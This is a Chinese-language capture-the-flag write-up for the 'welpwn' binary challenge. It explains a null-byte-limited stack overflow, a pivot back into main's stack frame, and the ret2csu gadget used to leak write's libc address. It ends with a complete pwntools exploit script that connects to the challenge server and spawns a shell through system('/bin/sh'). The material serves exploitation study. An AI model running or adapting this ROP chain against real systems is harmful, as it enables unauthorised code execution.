welpwn
题目在攻防世界。
先查看一下保护,没有canary,用ida看一下程序流
这里很像是栈溢出,但没有溢出。
接着再看echo函数
稍微逆向一下可以发现的是,eval内部有一个数组,把之前读入的0x400字节的前16个放到s2中。但是遇到0就推出了
但是在64位系统中,是不能避免地址出现0的情况的。我们因此只能控制输入的第一个地址。因为第一个地址在小端法中是地址在前,0在后,因此可以被读入。这里感觉有点象是栈迁移的思路,好在这道题有别的方法,不用栈迁移这么复杂。
观察到echo是在main中被调用的,我们第一次输入的内容实际上是储存在main的栈帧中也存在一份。那么有没有可能,我们退回到上一个函数的栈帧中?但是由于在main中,我们一开始输入了长度为24的padding,这一部分需要跳过。
在gardet里面寻找能够产生4个以上pop的gardet(24+p64(该函数本身))容易想到可以用通用gardet,但是这里也有一个正好是四个的pop,
嗯其实他好像就是通用gardet…
好吧,那就通过这四个pop,吧一开始输入的a去除掉。接下来可以进行一般的rop,先泄露libc基址,在传入system这样的流程
这里看了网上的wp,看到了是用通用gardet的方法,就正好复习一下好久没用过的通用gardet,这里是源代码部分的原理
我们先进入地址0x40082a,之后ret到400810,可以看到正好把之前pop的几个参数友传递回rdx,rsi,edi这三个重要的寄存器。基本可以控制所有函数的参数。之后再一个call命令,正好到达我们想去的地址,好像正是为黑客准备的啊哈哈哈哈。输入参数时要注意以下规则。
这是为了call函数(0x400819这一步)以及寄存器取值。可以看ctf-all-in-one
好了,接下来构造payload1,泄露write地址
payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_6_ret)+p64(0)+p64(1)+p64(write_got)+p64(0x8)+p64(write_got)+p64(1)+p64(part2)
payload+='aaaaaaaa'+'bbbbbbbb'+'cccccccc'+'dddddddd'+'eeeeeeee'+'ffffffff'+'gggggggg'+p64(main_addr)
# 最后这一行+=是因为上面那个通用gardet中0x400819call用完了t他还会pop一坨东西,要把这些东西去除,才能ret到正确地址
注意这里调用函数的时候是write_got!因为是call而不是ret,在已经绑定之后的write_got表中存放的是write的真实地址,如果写write_plt就不是call的作用了。
拿到write地址之后,libcSearcher寻找一下,就找到了。
之后就是找初始地址,找偏移,传system,不再赘述了
exp
from pwn import *
from LibcSearcher import *
# io=process('./welpwn')
io=remote('111.200.241.244',49896)
context.log_level='debug'
elf=ELF('./welpwn')
puts_addr=elf.plt['puts']
write_got=elf.got['write']
write_plt=elf.plt['write']
printf_got=elf.got['printf']
pop_rdi_ret = 0x00000000004008a3
pop_4_ret=0x000000000040089c
pop_6_ret=0x40089A
part2=0x400880
main_addr=0x4007CD
io.recvline()
# gdb.attach(io,"b *0x4007CB")
payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_6_ret)+p64(0)+p64(1)+p64(write_got)+p64(0x8)+p64(write_got)+p64(1)+p64(part2)
payload+='aaaaaaaa'+'bbbbbbbb'+'cccccccc'+'dddddddd'+'eeeeeeee'+'ffffffff'+'gggggggg'+p64(main_addr)
io.sendline(payload)
write_addr = u64(io.recv(8))
libc=LibcSearcher('write',write_addr)
write_bias=libc.dump('write')
libc_base=write_addr-write_bias
print hex(write_addr)
system_addr=libc_base+libc.dump('system')
str_bin_sh = libc_base+libc.dump("str_bin_sh")
io.recvline()
payload='a'*(16+8)+p64(pop_4_ret)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(system_addr)
# gdb.attach(io,"b *0x4007CB")
io.sendline(payload)
io.interactive()
这题主要学到的就是,因为他是调用了内部的函数,比较巧的是这个函数的栈帧正好比较小,正好可以回到上一个函数的栈帧,然后再上一个函数的栈帧中rop,算是比较创新的。而且也就当复习了一下通用gardet的用法。